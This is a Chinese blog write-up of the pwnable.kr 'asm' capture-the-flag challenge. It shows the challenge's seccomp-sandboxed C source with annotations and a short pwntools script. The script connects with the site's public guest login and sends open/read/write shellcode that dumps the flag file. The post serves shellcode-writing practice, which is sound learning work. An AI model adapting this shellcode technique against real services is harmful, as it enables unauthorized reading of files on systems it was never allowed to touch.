Pwnable之[Toddler's Bottle](三)--asm

最新推荐文章于 2022-03-16 09:15:36 发布
最新推荐文章于 2022-03-16 09:15:36 发布
阅读量258 收藏
点赞数
分类专栏: PWN 幼儿 Bottle 文章标签: Toddler's Bottle asm
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_35495684/article/details/79761372
版权

Pwnable之[Toddler’s Bottle](三)–ASM

提示:我觉得一个黑客应该知道怎么做shellcode

查看代码asm.c的代码

#include <stdio.h>
#include <string.h>
#include <stdlib.h>
#include <sys/mman.h>
#include <seccomp.h>
#include <sys/prctl.h>
#include <fcntl.h>
#include <unistd.h>

#define LENGTH 128

void sandbox(){
    scmp_filter_ctx ctx = seccomp_init(SCMP_ACT_KILL);
    if (ctx == NULL) {
        printf("seccomp error\n");
        exit(0);
    }

    seccomp_rule_add(ctx, SCMP_ACT_ALLOW, SCMP_SYS(open), 0);
    seccomp_rule_add(ctx, SCMP_ACT_ALLOW, SCMP_SYS(read), 0);
    seccomp_rule_add(ctx, SCMP_ACT_ALLOW, SCMP_SYS(write), 0);
    seccomp_rule_add(ctx, SCMP_ACT_ALLOW, SCMP_SYS(exit), 0);
    seccomp_rule_add(ctx, SCMP_ACT_ALLOW, SCMP_SYS(exit_group), 0);

    if (seccomp_load(ctx) < 0){
        seccomp_release(ctx);
        printf("seccomp error\n");
        exit(0);
    }
    seccomp_release(ctx);
}

char stub[] = "\x48\x31\xc0\x48\x31\xdb\x48\x31\xc9\x48\x31\xd2\x48\x31\xf6\x48\x31\xff\x48\x31\xed\x4d\x31\xc0\x4d\x31\xc9\x4d\x31\xd2\x4d\x31\xdb\x4d\x31\xe4\x4d\x31\xed\x4d\x31\xf6\x4d\x31\xff";
unsigned char filter[256];
int main(int argc, char* argv[]){

    setvbuf(stdout, 0, _IONBF, 0);
    setvbuf(stdin, 0, _IOLBF, 0);

    printf("Welcome to shellcoding practice challenge.\n");//欢迎来到shellcode制作实验挑战
    printf("In this challenge, you can run your x64 shellcode under SECCOMP sandbox.\n");//这个挑战,你可以执行shellcode在seccomp沙箱上
    printf("Try to make shellcode that spits flag using open()/read()/write() systemcalls only.\n");//尝试制作shellcode
    printf("If this does not challenge you. you should play 'asg' challenge :)\n");//如果这个难不到你的话,可以尝试‘asg’挑战

    char* sh = (char*)mmap(0x41414000, 0x1000, 7, MAP_ANONYMOUS | MAP_FIXED | MAP_PRIVATE, 0, 0);
    memset(sh, 0x90, 0x1000);//创建0x1000的空间给sh并赋值为0x90
    memcpy(sh, stub, strlen(stub));//把stub[]里的代码复制给sh

    int offset = sizeof(stub);
    printf("give me your x64 shellcode: ");
    read(0, sh+offset, 1000);//读取标准输入中sh+offset的值

    alarm(10);
    chroot("/home/asm_pwn");    // you are in chroot jail. so you can't use symlink in /tmp  你在chroot监狱。所以你不能使用/tmp链接
    sandbox();//执行沙箱
    ((void (*)(void))sh)();//从sh地址处开始执行函数,无返回无参数
    return 0;
}

上面是我解析过的代码。
可以很清晰的了解程序的思路。
程序创建0x1000空间给sh,然后吧stub复制进去再执行。
接着要你输入你的shellcode。
最后进入沙箱,沙箱里只能执行read,write,open,还有exit 和 exit_group。

先要明白stub[]里的code是什么意思,用pwntools的disasm()反汇编下。
这里写图片描述
知道里面的都只是清空寄存器的意思。

我们知道flag在
this_is_pwnable.kr_flag_file_please_read_this_file.sorry_the_file_name_is_very_loooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooo0000000000000000000000000ooooooooooooooooooooooo000000000000o0o0o0o0o0o0ong
这个文件里。

那么思路就很清晰了。
编写一个shellcode,先打开这个文件read到一个寄存器里,再write到标准输出上。
在执行这shellcode时就会输出flag。

构造exp:

# -*- coding: utf-8 -*-
from  pwn import *

con=ssh(host='pwnable.kr', user='asm', password='guest', port=2222)
p = con.connect_remote('localhost', 9026)
context(arch='amd64', os='linux')
shellcode=""
shellcode = shellcode+shellcraft.open('this_is_pwnable.kr_flag_file_please_read_this_file.sorry_the_file_name_is_very_loooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooo0000000000000000000000000ooooooooooooooooooooooo000000000000o0o0o0o0o0o0ong')
shellcode =shellcode+shellcraft.read('rax','rsp',1000)
shellcode =shellcode+shellcraft.write(1,'rsp',1000)
#print shellcode
log.info(shellcode)
p.recvuntil('shellcode:')
print "shellcode is :"
p.send(asm(shellcode))
log.success(p.recvline())

参考文章:
https://blog.csdn.net/qq_33528164/article/details/71023772
https://blog.csdn.net/weixin_41400278/article/details/78819950
http://www.cnblogs.com/p4nda/p/7169456.html

Jaken1223
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
Toddler Tap-开源
07-20
一个针对看到您使用键盘并希望这样做的幼儿的项目。 在其当前配置中,该项目将显示一个项目、单词并说出与按下的键相关的单词。
pwnable之asm
pwd_3的博客
09-27 635
问题描述Welcome to shellcoding practice challenge. In this challenge, you can run your x64 shellcode under SECCOMP sandbox. Try to make shellcode that spits flag using open()/read()/write() systemcalls onl
pwnable.kr 之asm
Bill
04-30 2107
一个真正的高手应该学会写shellcode. 首先查看c代码:#include <stdio.h> #include <string.h> #include <stdlib.h> #include <sys/mman.h> #include <seccomp.h> #include <sys/prctl.h> #include <fcntl.h> #include <unistd.h>#defin
pwnable-asm
网安星空
02-09 1422
pwnable.kr是一个经典的CTF中PWN方向练习的专业网站,本文记录的题目是asm,主要考察的是shellcode的使用。
pwnable_asm
z1r0的博客
03-16 249
pwnable_asm 查看保护 orw来读flag就可以了,程序在0x41414000这里创建了0x1000大小的空间,我们可以将flag拿到这里然后 输出即可。 orw其实就是open read write open(file=‘flag’, oflag=0, mode=0); read(3, 0x41414000, 0x100) write(fd=1, buf=0x41414000, n=0x100) 意思就是打开flag,读取flag到0x41414000,从0x41414000中读取数据到屏幕
asm - pwnable
SkYe's Blog
09-20 262
asm - pwnable 题目 Mommy! I think I know how to make shellcodes ssh asm@pwnable.kr -p2222 (pw: guest) readme文件给出提示: once you connect to port 9026, the "asm" binary will be executed under asm_pwn privi...
A Toddler Game-开源
05-26
幼儿游戏(1-4岁),可教授字母和数字的声音,并具有其他基本的教育内容。 这是使用SDL用C#编写的。 它是在Linux上编写的,但应在具有Mono(或.NET)和SDL的任何文件上运行。
Kids Key - Alphabet Training for Toddler-开源
04-28
一个适合小孩(1-4岁)的简单“游戏”,它使用字母和骑车颜色来帮助教导和增强ABC的颜色和数字。 这是向幼儿和父母可以理解并从中受益的简单计算迈出的一步。
Toddler-care-website:使用 Django 的互联网编程实验室迷你项目
08-04
幼儿护理网站 -------互联网编程实验室迷你项目------- 这是一个使用 Django 框架构建的网站,用于聘请保姆和订购产品来照顾幼儿。
JORY:学龄前幼儿学习计划
05-12
乔伊 JORY是面向本地和非本地英语儿童的直观,交互式且灵活的学前学习计划。 它提供了针对7个不同... 该程序最重要的功能之一是它允许用户(父母)向每个主题添加新元素,删除元素并修改现有元素。 保留所有权利2016
pwnable.kr】 asm
子曰小玖的博客
06-05 261
https://www.cnblogs.com/p4nda/p/7169456.html 一道写shellcode的题目, #include <stdio.h> #include <string.h> #include <stdlib.h> #include <sys/mman.h> #include <seccomp.h> #...
pwnable.kr asm
r250414958的博客
12-08 248
看样子是一道和shellcode有关的题目 连上去看看 目录下好像有个说明的文件查看一下 大概意思就是连接到9026端口 asm再特权下执行并get flag 那我们先看一下asm.c #include <stdio.h> #include <string.h> #include <stdlib.h> #include <sys/mman.h>...
pwnable.kr之asm
Jason_ZhouYetao的博客
07-23 543
这题我认为主要考察的知识点一个是沙箱中可用函数还有就是shellcode这个大头问题。 首先看看这道题目的代码: root@kali:~# ssh asm@pwnable.kr -p2222 asm@pwnable.kr's password: ____ __ __ ____ ____ ____ _ ___ __ _ ____ | ...
pwnable.kr [asm]
shisuan1的博客
12-26 361
pwnable.kr [asm] #include &lt;stdio.h&gt; #include &lt;string.h&gt; #include &lt;stdlib.h&gt; #include &lt;sys/mman.h&gt; #include &lt;seccomp.h&gt; #include &lt;sys/prctl.h&gt; #include &lt;fcntl.h&g
pwnable.k asm 知识点总结
qq_43189757的博客
06-25 323
1.mmap 创建新的内存虚拟区域 void *mmap(void *start, size_t length, int prot, int flags, int fd, off_t offset); start: 新的虚拟内存区域最好是从start 开始的一个区域 length: 连续的对象片的大小为length 字节 offset:从据文件开始处偏移量为offset字节的地方开始 prot:...
pwnable.kr解题write up —— Toddler's Bottle(一)
逆水行舟
01-18 6711
网站地址:pwnable.kr 提供许多优质的ctf训练题,题目设计的都非常巧妙,适合思考。
pwnable 笔记 Toddler's Bottle -passcode
pumpkin9
04-01 211
题目 用ssh连接一下 运行一下passcode 竟然发现错误。。 可以发现需要输入 name passcode1 passcode2 再查看一下源代码 这个题一共有两个函数welcome()和login() welcome中输入了name,并且字符串大小是100 login中输入了pass code1 和passcode2 在passcode1=338150(0...
[Toddler's Bottle]-[bof]
ACdream
05-04 711
linux下的所谓的简单的缓冲区溢出的题 这是题目链接中给的bof.c源代码 #include #include #include void func(int key){ char overflowme[32]; printf("overflow me : "); gets(overflowme); // smash me! if(key == 0xcafebabe)
[Toddler's Bottle]-[leg]
ACdream
07-25 426
真心好久没有开新题了,没有忘记pwn这个事情的 先说说这个题的重点在哪儿 重点在于两个地方: A:这个是一个汇编题,与熟悉的X86的汇编语句不一样,很明显需要去查询其他汇编语言的相关知识,考验自学能力 B:关键代码在main中: key1()+key2()+key3()) == key key是输入的一个值,key1(),key2(),key3()都是汇编函数中的返回的固定值,
字符串["Baby","Toddler","Kids","Matching-Outfits","Maternity-Nursing","Licensed-Characters","Home-Baby-Gear","Shoes-Accessories"]转为java数组
最新发布
12-07
以下是将字符串["Baby","Toddler","Kids","Matching-Outfits","Maternity-Nursing","Licensed-Characters","Home-Baby-Gear","Shoes-Accessories"]转换为Java数组的代码示例: ```java String[] strArr = {"Baby",...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值